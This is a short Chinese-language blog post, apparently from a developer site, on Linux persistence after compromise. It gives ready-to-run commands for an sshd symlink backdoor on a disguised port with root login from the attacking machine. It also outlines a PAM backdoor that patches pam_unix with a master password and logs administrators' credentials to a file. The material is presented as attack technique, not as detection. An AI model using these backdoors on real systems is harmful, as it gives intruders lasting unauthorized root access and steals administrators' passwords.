Linux权限维持

SSH 后门

软链接sshd

目标主机建立软连接:

ln -sf /usr/sbin/sshd /tmp/su;/tmp/su -oport=1189

#端口可以任意指定,最好伪装一下

查看端口:

netstat -anlp|grep 1189

攻击机ssh登录:

ssh root@x.x.x.x -p 1189

#如果root用户被禁止登陆时,可以利用其他存在的用户身份登陆

具体原理:https://www.cnblogs.com/likaiming/p/11007919.html

Linux PAM密码记录后门

PAM(Pluggable Authentication Modules),是由Sun提出的一种认证机制。它通过一共一些动态链接库和一套统一的API,将系统提供的服务和该服务的认证方式分开,使得系统管理员可以灵活地根据需要给不同的服务配置不同的认证方式而无需更改服务程序,同时也便于向系统中添加新的认证手段。

这种后门主要是通过pam_unix_auth.c打补丁的方式潜入到正常的pam模块中,以此来记录管理员的账号密码。其大致流程如下:

1.获取目标系统所使用的PAM版本,下载对应版本的pam版本

2.解压缩,修改pam_unix_auth.c文件,添加万能密码

3.编译安装PAM

4.编译完后的文件在:modules/pam_unix/.libs/pam_unix.so,复制到/lib64/security中进行替换,即可使用万能密码登陆,并将用户名密码记录到文件中。

参考:

Linux-PAM后门

其他方法请参考:

第4篇:Linux权限维持--后门篇 · 应急响应实战笔记

Linux 下的权限维持 - V4ler1an

相关推荐
ybb_ymm1 小时前
mysql8在linux下的默认规则修改
linux·运维·数据库·mysql
半梦半醒*1 小时前
zabbix安装
linux·运维·前端·网络·zabbix
Panda__Panda2 小时前
docker项目打包演示项目(数字排序服务)
运维·javascript·python·docker·容器·c#
xx.ii2 小时前
Docker监控
运维·docker·容器
板鸭〈小号〉3 小时前
Socket网络编程(2)-command_server
运维·服务器
维尔切3 小时前
Docker 存储与数据共享
运维·docker·容器
温柔一只鬼.3 小时前
Docker快速入门——第四章Docker镜像
运维·docker·容器
温柔一只鬼.4 小时前
Docker快速入门——Windowns系统下Docker安装(2025最新理解与完整,附带WSL1如何升级为WSL2)
运维·docker·容器
武文斌774 小时前
复习总结最终版:单片机
linux·单片机·嵌入式硬件·学习
驱动探索者4 小时前
贝尔实验室发展史:20世纪科技圣殿的辉煌与沉浮
linux